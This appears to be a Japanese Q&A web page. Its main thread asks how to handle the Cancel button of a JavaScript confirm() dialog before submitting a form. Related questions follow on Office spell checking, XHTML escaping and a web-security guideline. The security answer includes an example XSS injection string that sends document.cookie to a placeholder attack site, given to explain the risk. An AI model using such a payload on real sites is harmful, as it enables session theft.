いつもお世話になっています。

<script language="JavaScript">
<!--
function startConfirm(){
confirm("本当によろしいですか?");
}
// -->
</script>
</head>

(中略)

<form action="next.asp" target="_top" name="me">
<td>
<input TYPE="submit" value="全削除" name="all_del" onclick="startConfirm()">
</td>
</form>

と、このようなボタンを押したときに確認メッセージを表示させています。
キャンセルを押した場合にnext.aspに遷移せず、自分の画面に戻る
または他の画面に遷移させたいのです。

startConfirm()の中に処理を書けば良いのでしょうが、哀しいかな、わかりません(涙)。
やり方をご存知の方、教えてください。

alertでOKを押された時の処理を任意に行う方法も教えていただけたら嬉しいです。

このQ&Aに関連する最新のQ&A

A 回答 (3件)

こんにちはさん、xruzです。


submitボタンにこだわらずscriptでsubmit()すれば柔軟に対応できますよ。
こんな感じではいけませんか?

<html>
<head>
<title>submit</title>
</head>
<script language="javascript">
<!--
function frmSubmit() {
var errFlag=true;
// チェックとか処理とかをします
if(errFlag==false) {
// alert("Err"); // エラー処理かな
return;
}
if(confirm("Send Ok?")) {
// document.frm.target="main"; // 表示先の変更
// document.frm.action="hoge.asp"; // リンク先の変更
document.frm.submit();
} else {
// this.location.href="jump.cgi"; // キャンセルした場合のリンク先?
}
}
//-->
</script>
<body>

<form method="post" action="" name="frm" target="_self">

<input type="button" value="send" onclick="frmSubmit();">
</form>

</body>
</html>

がんばってくださいね。
    • good
    • 2
この回答へのお礼

本当に丁寧な回答、ありがとうございます。
お礼が大変遅くなってすみませんでした・・・。

貼り付けたら見事に動きました(当たり前だ)。感動です。
コメントもつけて頂いていたので、どこに何を書いたらどう動くのかすぐわかり、
これまた大変ありがたかったです。

このコメント付きのソースを色々加工させて頂いて、
さらにややこしいエラー処理などに挑戦したいと思います。

また機会がありましたら、教えてやって下さい(ペコリ)。

お礼日時:2001/10/19 18:11

まず、confirm()の使い方ですが戻り値を使います



if(confirm("いいですか~")==true){
 // OK ボタンが押されたときの処理
}else{
 //キャンセルボタン が押されたときの処理
}


次に、画面遷移についてですが、

>input TYPE="submit" value="全削除" name="all_del" onclick="startConfirm()">

の意味は「全削除」ボタンを押したら、(確認してOKだったら)フォームの内容を送信するということでしょうか?

だとすると、FORMタグのonSubmitイベントハンドラに書くのが一般的です

<FORM NAME="formmname" ACTION="送信先" onSubmit="return startConfirm()">
<INPUT TYPE="submit" VALUE="全削除">
</FORM>

…ここまで書いてたら、下記にずばりな回答がありましたので、これは補足で見て下さい。
    • good
    • 0
この回答へのお礼

早速の回答、ありがとうございます。
なのにお礼が遅くなってすみません・・・。

画面遷移の
<input TYPE="submit" value="全削除" name="all_del" onclick="startConfirm()">
の意味もkana-tanさんの想像通りです。

今までsubmitボタンの中にonClickで書くとばかり思ってました。
onSubmitで書くのは、enterキーを押した時でも動作できるようにするためなのでしょうか?

あと、補足だなんてとんでもないです。
キャンセルボタンが押された時の処理を行う方法を書いて頂いてありがたかったです。
かなり利用できる発想を頂きました。

また機会がありましたら、よろしくお願いします(ペコリ)。

お礼日時:2001/10/19 17:59

confirmはOKボタンが押された時にtrue、キャンセルボタンが押された時にfalseが返ってきます。


これを利用して
フォームタグを
<form action="next.asp" target="_top" name="me" onSubmit="return startConfirm()">
スクリプトを
function startConfirm(){
return (confirm("本当によろしいですか?"));
}
という風にすれば、押されたボタンの結果が返り、OKならnext.aspが呼び出されるという感じになります。

alertは、フォームの記述が上と同じだった場合、
表示した後にtrueを返すとnext.aspを実行、
falseを返すとそのまま何も実行しない。
というどうさになります。
    • good
    • 0
この回答へのお礼

早速の回答、ありがとうございました。
返事が遅くなってすみません・・・。

貼り付けるだけでできました。
丁寧かつ親切な回答で助かりました。

また機会があったら教えてやって下さい(ペコリ)。

お礼日時:2001/10/19 17:51

このQ&Aに関連する人気のQ&A

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!

このQ&Aを見た人はこんなQ&Aも見ています

このQ&Aを見た人が検索しているワード

このQ&Aと関連する良く見られている質問

Qofficeのスペルチェックについて

お世話になります。

officeのスペルチェックについて教えていただきたいことがあります。
ちなみにoffice2007です。

今、パワーポイントで、資料を作成しているので、できればパワーポイントで解答をいただけるとうれしいですが、ワードでもエクセルでもわかる方がいらっしゃればご解答をお願いします。

本題ですが、スペルチェックを実行して、引っかかった文字列を[無視]ボタンをクリックすると、以降何度、スペルチェックしても、2度と引っかかることがなくなります。

この状態から、もう一度スペルチェックに引っかかるようにするには、どうしたらよいのでしょうか?

1つ見つけた方法は、同じ文字列を入力すること。

一応これで、もう一度スペルチェックに引っかかる状態には戻ります。コピペでもOK。

その他に方法がありそうなのですが、わからないので、どなたかわかる方お願いします。

なんでこんな質問をしたかというと、いっぱいスペルチェックして、どこをスペルチェックしたかわからない状態になってしまい、最初からスペルチェックをやり直そうと思ったのです。

どなたかよろしくお願いします。

お世話になります。

officeのスペルチェックについて教えていただきたいことがあります。
ちなみにoffice2007です。

今、パワーポイントで、資料を作成しているので、できればパワーポイントで解答をいただけるとうれしいですが、ワードでもエクセルでもわかる方がいらっしゃればご解答をお願いします。

本題ですが、スペルチェックを実行して、引っかかった文字列を[無視]ボタンをクリックすると、以降何度、スペルチェックしても、2度と引っかかることがなくなります。

この状態から、もう一度スペルチェッ...続きを読む

Aベストアンサー

PowerPointのオプションの文章校正欄で、「入力時にスペルチェックを行う」のチェックを外し、一回OKでダイアログを閉じます。
再度オプションを開き「入力時にスペルチェックを行う」のチェックを入れ、OKでダイアログを閉じます。

校閲タブでスペルチェックと文章校正を行ってみます。

Q 内に書くことはできません」

元アルバイト先に頼まれてサイトを作り運営しているのですが、わからないことがあるので教えて下さい。

サイトはXHTML1.0 Transitional で作っており、ここに、http://fmono.sub.jp/ の「w3Analyzer」を組み込みアクセス解析をしています。サイト自体もこのアクセス解析も正常に動作しています。
ただ、このサイトをhttp://openlab.ring.gr.jp/k16/htmllint/htmllint.htmlで構文チェックすると、アクセス解析のタグにエラー「<img>を~行目の<script>~</script>内に書くことはできません。」が表示されてしまいます。
エラーが表示されるタグは下記のようなものです。

<script type="text/javascript">
document.write('<img src="http://~/w3a/writelog.php?ref='+document.referrer+'" width="1" height="1" />');
</script> >

アクセスログは普通に取得できているので問題ないのですが、もし上記エラーを回避する方法があればご教授下さい。よろしくお願いします。

元アルバイト先に頼まれてサイトを作り運営しているのですが、わからないことがあるので教えて下さい。

サイトはXHTML1.0 Transitional で作っており、ここに、http://fmono.sub.jp/ の「w3Analyzer」を組み込みアクセス解析をしています。サイト自体もこのアクセス解析も正常に動作しています。
ただ、このサイトをhttp://openlab.ring.gr.jp/k16/htmllint/htmllint.htmlで構文チェックすると、アクセス解析のタグにエラー「<img>を~行目の<script>~</script>内に書くことはできません。」が表示されてし...続きを読む

Aベストアンサー

XHTML には「ホンモノの XHTML」と「ニセモノの XHTML」があります。「ホンモノの XHTML」とは application/xml または application/xhtml+xml として識別されるもの、「ニセモノの XHTML」は text/html で識別されるものです。

※実際にはどちらも本物です。ここでは「HTML 互換として処理される XHTML」を「ニセモノ」、「XML として解析される XHTML」を「ホンモノ」と、カタカナ&カッコ付きで書いています。

「ホンモノの XHTML」として見れば、質問文のソースは妥当性違反です。なぜなら、img 要素のタグがエスケープされていないため、これがスクリプトの一部ではなく文書構成要素だと判断されるからです。XHTML 1.0 のスキーマは、script 要素内に img 要素が出現することを許していません。もちろん、スクリプトとしても正しく動作しません。

従って、XML のルールに従ってエスケープする必要があります。特に「<」と「&」は必ずエスケープしなければなりません。

document.write('&lt;img .... />');

ですが面倒なことに、「ニセモノの XHTML」ではこれが動作しなくなります。「ニセモノの XHTML」は、HTML との互換性のために script 要素内の「<」「&」をうまく扱ってくれるのですが、それが仇となり、上記では「&lt;」が「<」に戻りません。

ならば、コメント区間にするのはどうでしょう。XML でもコメント内なら「<」「&」が現れても大丈夫です(ただし「--」だけは駄目です)。

<script type="text/javascript"><!--
document.write('<img .... />');
//--></script>

「ニセモノの XHTML」ならこれでも構いません。しかし、「ホンモノの XHTML」では、コメントは本当に破棄されてしまい、上記では動作すらしなくなります。

そこで、XML/HTML のルールを使わず、JavaScript のルールでエスケープすることを考えます。

document.write('\u003Cimg .... />');

これなら大丈夫でしょう。XML/HTML に限らず、言語が混在する際は必ず適切なエスケープを施す必要があります。エスケープを避けたければ外部スクリプトにして下さい。


なお、ここには別の問題があります。そもそも「ホンモノの XHTML」では、document.write を使用できません。これは HTML 互換の機能だからです(HTML5 に明記されています)。

XHTML を採用するのであれば、それが「ホンモノ」でも「ニセモノ」でも大丈夫なよう、document.write に頼らないコードを作成して下さい。あるいは try...catch で括るなどして、「ニセモノ」として処理されたときのみコードが動作するよう工夫して下さい。あるいはいっそ、XHTML を止めるのも 1 つの選択でしょう。

XHTML には「ホンモノの XHTML」と「ニセモノの XHTML」があります。「ホンモノの XHTML」とは application/xml または application/xhtml+xml として識別されるもの、「ニセモノの XHTML」は text/html で識別されるものです。

※実際にはどちらも本物です。ここでは「HTML 互換として処理される XHTML」を「ニセモノ」、「XML として解析される XHTML」を「ホンモノ」と、カタカナ&カッコ付きで書いています。

「ホンモノの XHTML」として見れば、質問文のソースは妥当性違反です。なぜなら、img 要素のタ...続きを読む

QWindows Mail でスペルチェックできない

Windows Mail を使っています。英語のスペルチェックをしたいのですが、「この言語でスペルチェックを実行することができません。オプションダイヤログで別の言語を選択してください。」 とメッセージが出てしまいます。

WORDに貼り付ければスペルチェックができます。
スペルチェックできるようにするにはどうしたら良いでしょうか。

使っているのは Windows Vista 、 nifty Windows mail です。

Aベストアンサー

「この言語ではスペル チェックを実行することができません。スペル チェックのオプション ダイアログで別の言語を選択してください。」とのエラーメッセージが出る場合の案内です。
(Windows Vista で 英語のスペル チェックを Windows メールで実行するとエラーが発生する場合がある)
http://support.microsoft.com/kb/932096/ja

(その他参考:スペル チェックの Windows メールでの英語のテキストが期待どおりに動作しません。)
http://support.microsoft.com/kb/933142/ja

Q内のコードの抽出方法

Ajaxで読み込んだHTML文書内にあるスクリプトのコードだけを
抽出したいのですが、正規表現を教えてください。
自分で考えてみたものは、以下の方法です。
これが最良なのかわかりません。
「スクリプトは複数箇所に存在しない」という条件で構いません。
宜しくお願いします。

var HTML = 'ここにHTML';
HTML.match(/.*<script.*>([\w\W]*)<\/script>.*/);
scr = RegExp.$1;
eval(scr);

Aベストアンサー

>改行が
ああそうか・・・ mフラグ付けると どう?
ダメなら [\s\S]* とか使う事になると思うけど・・・

QWord のスペルチェックと文章校正

Word オプションの「文章校正」には、「Microsoft Office プログラムのスペルチェック」と「Word のスペルチェックと文章校正」との別々の大項目がありますが、Office プログラム共通のスペルチェックでなく、Word 独特のスペルチェックが必要な何かがあるのでしょうか?

分けて扱っている意味がよくわかりません。

できれば具体例で教えてください、よろしくお願いします。

Aベストアンサー

具体的に説明すると大変なので、簡単な説明ですが。

> Microsoft Office プログラムのスペルチェック
これは、Officeプログラムとして用意されている指定言語の辞書を元に
したチェックツールであり、辞書として用意されているスペルと比較して
類似のものだけをチェックするものですね。
辞書にない場合に
このスペルチェック用のツールとして用意されている言語に[日本語]は
含まれていないので、日本語はチェックされません。

> Word のスペルチェックと文章校正
Outlook、Word、PowerPoint は入力時に自動でチェックしますが、他の
ものは手動でスペルチェックを実行する必要があります。
Wordなどでは、この自動でチェックをする機能を設定する項目があり、
これをチェックしておけば、赤や青などの波線で表示してくれます。
https://support.office.com/ja-jp/article/Office-2010-%E4%BB%A5%E9%99%8D%E3%81%A7%E3%82%B9%E3%83%9A%E3%83%AB-%E3%83%81%E3%82%A7%E3%83%83%E3%82%AF%E3%81%A8%E6%96%87%E7%AB%A0%E6%A0%A1%E6%AD%A3%E3%82%92%E8%A1%8C%E3%81%86-5cdeced7-d81d-47de-9096-efd0ee909227

Word独自の機能としての文章校正は、[設定]ボタンでわかります。
http://www.tanimoto.to/Publishing_Librarian/Word_kousei/
文書のスタイルとして公用語などを指定すると、それに見合った設定に
チェックが付き、より厳密にチェックさえるようになります。
入力ミスだけでなく、表現としてのチェックや半角全角の混合のチェック
など、Word以外ではチェックされないこともチェックの対象にすることが
できるようになります。
http://www.wanichan.com/pc/word/2010/07/06.html

具体的に説明すると大変なので、簡単な説明ですが。

> Microsoft Office プログラムのスペルチェック
これは、Officeプログラムとして用意されている指定言語の辞書を元に
したチェックツールであり、辞書として用意されているスペルと比較して
類似のものだけをチェックするものですね。
辞書にない場合に
このスペルチェック用のツールとして用意されている言語に[日本語]は
含まれていないので、日本語はチェックされません。

> Word のスペルチェックと文章校正
Outlook、Word、PowerPoint は入力時に自動で...続きを読む

Q 要素の内

▽安全なウェブサイトの作り方
  http://www.ipa.go.jp/security/vuln/documents/website_security.pdf

><script>...</script> 要素の内容を動的に生成しない
>ウェブページに出力する<script>...</script>要素の内容が、外部からの入力に依存する形で動的に生成される場合、任意のスクリプトが埋め込まれてしまう可能性があります

・P25で上記のように書かれているのですが、理解できません(何故ここだけ動的生成してはいけないのか等)
・具体的にどのようにして埋め込まれる恐れがあるのでしょうか?
・またここで書いている内容は、下記何れを指しているのでしょうか?
・ココカラ<script>...</script>ココマデ
・<script>ココカラ...ココマデ</script>

Aベストアンサー

攻撃の容易性でしょう。

この脆弱性を付く攻撃をする際に一番苦労するのが <script> をどうやって埋め込むかです。これは入力内容のエスケープ処理で大体は塞がれてしまうのですが、<script> 要素内に直接埋めこめられるならその問題が無いので、かなり攻撃しやすいサイトとなります。

埋め込み方法ですが、以下の様な生成をするサイトの場合なら

入力内容: 太郎
出力内容: <script>alert('こんにちは太郎さん')</script>

そのサイト内で使用している cookie 内容を盗聴するために、以下のように攻撃できます。

入力内容: ');window.location='http://攻撃サイト/'+document.cookie;a=('
出力内容: <script>alert('こんにちは');window.location='http://攻撃サイト/'+document.cookie;a=('さん')</script>

引用符のエスケープ処理で塞がれるかもしれませんが、それでも対処できる余地はあります。

Qスペル

英語などの単語にはスペルがありますが外人の名前のスペルは日本同様、親がスペルを決めるのですか?それとも単語のように決まっているものなのでしょうか?おしえて下さい。

Aベストアンサー

欧米人の名前は日本のように親が意味や字画を考えながら決めるのではなく、既に存在する名前(聖書の中、先祖の名前など)から選びます。それらの名前は古代に意味があってつけられたものですが、現代では
必ずしも意味は考えず聖人の名前、祖父の名前といった捉え方です。

例外として、小説家が考えだした新しい名前が映画化などで流行し、作家と同じ国の人ではなく、外国の人(親)もその名前を子供につけるというケースがあります。いずれにしても欧米人の名前は国際的に流通して綴りや発音が少しづつ変わっているものがあります。聖書の名前が多いのでユダヤ系の名前が多いということになります。

Q

<input type="hidden" name = "hoge">があったとします。
これを、javascriptを使用し nameで検索します。
”hoge”を検索後、その”hoge”という名前を変更する方法を探しています。 

<input type="hidden" name = "hoge">
       ↓↓↓↓↓
<input type="hidden" name = "fuga"> 

リフレッシュ無しで、上記のようにnameを変える方法が知りたいです。

ご存知の方おりましたら、お手数ですが教えていただけませんでしょうか。
宜しくお願いいたします。

Aベストアンサー

タグが特定出来れば、setAttribute等で属性値を変更出来ます。
setAttribute("name","fuga")

QOffice2000 スペルチェックの解除方法

Win95、Win98どちらもOffice2000を使っています。WordとExcelのスペルチェックを解除の方法教えてください。
例えばHTEと入力しEnter key を押します。次にEnterを押すかスペースkeyを押すとTHEに変わりスペルチェックが作動します。(Wordでの入力時)
Win95のExcelもスペルチェックが作動します。
Wordの場合、【オプション】→【文章校正】→【自動スペルチェック】のチャックを外しても作動してしまいます。
WordとExcelともスペルチェックのON/OFFを設定する所が分かりません。
またみなさんどのように使っていますか。

Aベストアンサー

スペルチェックでは無くて、ツール>オートコレクトじゃないでしょうか?

Qで、Q1に後で値を設定して表示するには

お世話になります。
<input type="text" name="Q1">で、Q1に後で値を設定して表示するにはどうしたら良いものでしょうか。
name="Q1"
と、しているので、
onMousedown="function()"
で、nameでしてしたエリアに値を書き込めば、できると思うのですが、
このfunction()をどのように書いたらよいものか、いろいろ調べてもわかりません。
何とかご教示願えないでしょうか。
よろしくお願いします。

Aベストアンサー

javascriptを利用することで出来ます。
こんな感じで動くでしょう。
ちなみにテキストボックスなどをjavascriptで操作する場合は
idをつけておくと便利です。

これ以上をやりたいというのであれば
参考URLなど見て勉強してみてください
<html>
<head>

</head>
<body>

<input type="text" id="Q1" name="Q1" onmousedown="hoge()">
</body>
<script type='text/javascript'>
function hoge()
{
Q1.value = ""; //""のなかに設定する値
}
</script>

参考URL:http://www.parkcity.ne.jp/~chaichan/src/javasc21.htm


このQ&Aを見た人がよく見るQ&A

人気Q&Aランキング

おすすめ情報